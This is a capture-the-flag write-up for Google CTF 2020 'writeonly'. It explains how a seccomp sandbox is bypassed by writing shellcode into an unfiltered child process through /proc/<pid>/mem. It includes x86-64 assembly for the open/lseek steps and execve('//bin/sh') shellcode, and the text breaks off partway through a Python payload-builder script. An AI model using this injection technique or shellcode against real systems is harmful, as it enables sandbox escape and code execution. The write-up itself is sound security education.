Tags: shellcode seccomp

Rating:

# Google CTF 2020 - writeonly

_tl;dr shellcode to bypass seccomp by injecting shellcode into child process to read the flag_

> This sandbox executes any shellcode you send. But thanks to seccomp, you won't be able to read /home/user/flag.

For this challenge, we are given the binary, the C source code, and a Makefile.

## Analyzing the binary

Since we were given source code, I didn't actually have to look at the binary in IDA much. The first thing I looked at was the seccomp rules being applied:

c
21 void setup_seccomp() {
22 scmp_filter_ctx ctx;
23 ctx = seccomp_init(SCMP_ACT_KILL);
24 int ret = 0;
25 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
26 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
27 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0);
28 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(stat), 0);
29 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fstat), 0);
30 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(lstat), 0);
31 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(lseek), 0);
32 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect), 0);
33 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0);
34 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(writev), 0);
35 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(access), 0);
36 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sched_yield), 0);
37 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(dup), 0);
38 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(dup2), 0);
39 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(clone), 0);
40 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fork), 0);
41 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(vfork), 0);
42 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(execve), 0);
43 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
44 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(kill), 0);
45 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(chdir), 0);
46 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fchdir), 0);
47 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(gettimeofday), 0);
48 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getuid), 0);
49 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getgid), 0);
50 ret |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
52 if (ret) {
53 exit(1);
54 }
55 }


If the seccomp rules aren't properly written, there's a chance you could use a 32 bit syscall (> 0x40000000) to bypass the filters ([see this writeup from RedRocket](http://blog.redrocket.club/2019/04/11/midnightsunctf-quals-2019-gissa2/)). Unfortunately, the filters check to ensure the syscall number is < 0x40000000, which we can see using [seccomp-tools](https://github.com/david942j/seccomp-tools):


$seccomp-tools dump ./chal [DEBUG] child pid: 624286 shellcode length? 1 reading 1 bytes of shellcode. a line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x1e 0xc000003e if (A != ARCH_X86_64) goto 0032 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x1b 0xffffffff if (A != 0xffffffff) goto 0032 0005: 0x15 0x19 0x00 0x00000001 if (A == write) goto 0031 0006: 0x15 0x18 0x00 0x00000002 if (A == open) goto 0031 0007: 0x15 0x17 0x00 0x00000003 if (A == close) goto 0031 0008: 0x15 0x16 0x00 0x00000004 if (A == stat) goto 0031 0009: 0x15 0x15 0x00 0x00000005 if (A == fstat) goto 0031 0010: 0x15 0x14 0x00 0x00000006 if (A == lstat) goto 0031 0011: 0x15 0x13 0x00 0x00000008 if (A == lseek) goto 0031 0012: 0x15 0x12 0x00 0x0000000a if (A == mprotect) goto 0031 0013: 0x15 0x11 0x00 0x0000000c if (A == brk) goto 0031 0014: 0x15 0x10 0x00 0x00000014 if (A == writev) goto 0031 0015: 0x15 0x0f 0x00 0x00000015 if (A == access) goto 0031 0016: 0x15 0x0e 0x00 0x00000018 if (A == sched_yield) goto 0031 0017: 0x15 0x0d 0x00 0x00000020 if (A == dup) goto 0031 0018: 0x15 0x0c 0x00 0x00000021 if (A == dup2) goto 0031 0019: 0x15 0x0b 0x00 0x00000038 if (A == clone) goto 0031 0020: 0x15 0x0a 0x00 0x00000039 if (A == fork) goto 0031 0021: 0x15 0x09 0x00 0x0000003a if (A == vfork) goto 0031 0022: 0x15 0x08 0x00 0x0000003b if (A == execve) goto 0031 0023: 0x15 0x07 0x00 0x0000003c if (A == exit) goto 0031 0024: 0x15 0x06 0x00 0x0000003e if (A == kill) goto 0031 0025: 0x15 0x05 0x00 0x00000050 if (A == chdir) goto 0031 0026: 0x15 0x04 0x00 0x00000051 if (A == fchdir) goto 0031 0027: 0x15 0x03 0x00 0x00000060 if (A == gettimeofday) goto 0031 0028: 0x15 0x02 0x00 0x00000066 if (A == getuid) goto 0031 0029: 0x15 0x01 0x00 0x00000068 if (A == getgid) goto 0031 0030: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0032 0031: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0032: 0x06 0x00 0x00 0x00000000 return KILL  At this point I know there wasn't going to be a trick to fully bypass the filters, so I needed to find a way to work with them to read the flag. We can make open and write syscalls, but we don't have read or mmap, so we can't read the flag off the file descriptor. I spent a few hours combing the man pages to try and find a trick with one of the other allowed syscalls but came up empty handed. One other interesting thing this binary does is fork a child process before applying the seccomp filters, so the filters aren't applied to the child process: c 113 void check_flag() { 114 while (1) { 115 char buf[4] = ""; 116 int fd = check(open("/home/user/flag", O_RDONLY), "open(flag)"); 117 if (read(fd, buf, sizeof(buf)) != sizeof(buf)) { 118 err(1, "read(flag)"); 119 } 120 close(fd); 121 if (memcmp(buf, "CTF{", sizeof(buf)) != 0) { 122 errx(1, "flag doesn't start with CTF{"); 123 } 124 sleep(1); 125 } 126 } 127 128 int main(int argc, char *argv[]) { 129 pid_t pid = check(fork(), "fork"); 130 if (!pid) { 131 while (1) { 132 check_flag(); 133 } 134 return 0; 135 } 136 137 printf("[DEBUG] child pid: %d\n", pid); 138 void_fn sc = read_shellcode(); 139 setup_seccomp(); 140 sc(); 141 142 return 0; 143 }  The check_flag() function at L113 is run in the child process (because pid will be 0 for the child proc at L130), but all the function does is read the first 4 characters of the flag. At this point I was stumped, until my teammate suggested something _brilliant_: > Only idea I've got so far for writeonly is to open /proc/${child_pid}/mem and overwrite its stack to make it print out the flag, or something like that.

This lead me to two realizations:

* I didn't know that a parent process had permissions to write to the proc/mem file for a child process.
* I _also_ didn't know that the memory permissions (r/w/x on each page) don't apply when accessing via proc/mem (I figured this out later, after wasting a bunch of time on less-than-ideal exploit paths)

## Writing the exploit

I initially tried to do this a few different ways:

* Write shellcode to an unused chunk of .bss, apply execute permissions with mprotect, and hijack the saved rip value from the sleep(1) call on L124 (this was a very dumb idea)
* Then, I tried to overwrite a function in .text that isn't being used (since it's already marked as executable memory), and hijack the saved rip again (less dumb but still not very smart)
* Finally, I overwrote the beginning of the while (1) loop on L114 to take advantage of the existing control flow for shellcode execution (good enough; detailed below)

Another syscall that was crucial for writing this exploit is lseek. In case you are unfamiliar, lseek allows you to move the cursor for a file to an arbitrary position. In this case, since we are accessing the proc/mem file (which is a special file used by the kernel to map the entire virtual memory space for a process), we need to use lseek to control which starting address to write to.

With this newfound knowledge in hand, I wrote an exploit that did the following:

1. open syscall to access the child proc/mem file
2. lseek syscall to set the pointer to the location in .text I wanted to overwrite
3. write syscall to write my shellcode to the desired location
4. Cross my fingers and hope for a flag

## Step 1: open

_Note: please don't take the following as advice on a good way to do this, use [asm() in pwntools](https://docs.pwntools.com/en/stable/asm.html) and your life will be much easier._

The goal for this first syscall is to create a file descriptor for the child proc/mem file. Unfortunately, since the PID of the child could change everytime, I needed to parse the output from the program to put in my shellcode, compile it, and then send it to open the proper file.

(It turns out that on the remote, the child PID ended up always being 2, probably due to how the Docker container was setup and the lack of other processes, so I could have just statically compiled it. But where's the fun in that?)

Here's a snippet from my exploit that dynamically compiles the shellcode:

py
40 with open("sc/inject.S", "r") as f:
42
43 log.info(f"child pid: {pid}")
44
45 while len(pid) != 8:
46 pid += "/"
47
48 with open("sc/shellcode.S", "w") as f:
49 f.write(inject_code.format(pid=pid[::-1].encode().hex()))
50
51 os.system("cd sc && make 64")
52
53 with open("sc/shellcode.bin", "rb") as f:


In my shellcode, I used {} as a format string so python could substitute the PID (L49 above) with the proper encoding to make it a string:

asm
23 // Open the child memory file
24 // fd = open("/proc/{pid}/mem", 1)
25 xor %rdx, %rdx
26 push %rdx
27 mov $0x6d656d2f2f2f2f2f, %rdx 28 push %rdx 29 mov$0x{pid}, %rdx
30 push %rdx
31 mov $0x2f636f72702f2f2f, %rdx 32 push %rdx 33 mov %rsp, %rdi 34 xor %rsi, %rsi 35 inc %rsi 36 xor %rax, %rax 37 mov$0x2, %al
38 syscall
39 mov %rax, %r9


The {pid} on L24 and L29 both got replaced by the reverse hex encoding of the PID (as a string), so that the string is properly built on the stack. An example ASCII version of that string is:


///proc////////2/////mem


(You can put as many slashes between directories as you want, the above is equivalent to /proc/2/mem. It's a great way to pad strings.)

## Step 2: lseek

Now that we have a file descriptor to the child's memory, we need to figure out where exactly to write to. I pulled open the binary in IDA and looked for a suitable address.

After the sleep(1) call returns, the program jumps back to 0x40223a, which is the beginning of the while (1) loop at L113. That seems like a solid candidate to overwrite:

asm
46 // lseek(fd, 0x40223a, 0)
47 mov %r9, %rdi
48 mov $0x40223a, %rsi // jmp dst after sleep in check_flag 49 xor %rdx, %rdx 50 xor %rax, %rax 51 mov$0x8, %al
52 syscall


## Step 3: write

Now that we are positioned in the proper location to overwrite with our shellcode, we need to figure out _what_ that shellcode will be. During the CTF, I used a standard ORW (open/read/write) payload to print the flag file, since I wasn't sure how I/O would work if I tried to pop a shell in the child process. I tested this after getting the flag and it worked as it normally would, and so that's the solution I have in the inject.S file. The ORW shellcode is also available to look at, though.

Here is the execve("//bin/sh", 0, 0) shellcode I used:

asm
7 //execve("//bin/sh", 0, 0)
8 xor %rdx, %rdx
9 xor %rsi, %rsi
10 mov $0x68732f6e69622f2f, %rdi 11 push %rsi 12 push %rdi 13 mov %rsp, %rdi 14 xor %rax, %rax 15 mov$0x3b, %al
16 syscall


Now, I needed someway of putting the above shellcode payload into the full payload, since I was using shellcode to write shellcode into the child process. I did this by writing a quick script to generate a series of mov and push instructions to put the shellcode on the stack in the proper order (yay little endian):

`py
10 while len(shellcode) % 8 != 0:
11 shellcode += b"\x90"
12
13 for i in range(len(shellcode), 0, -8):
14 b = struct.unpack("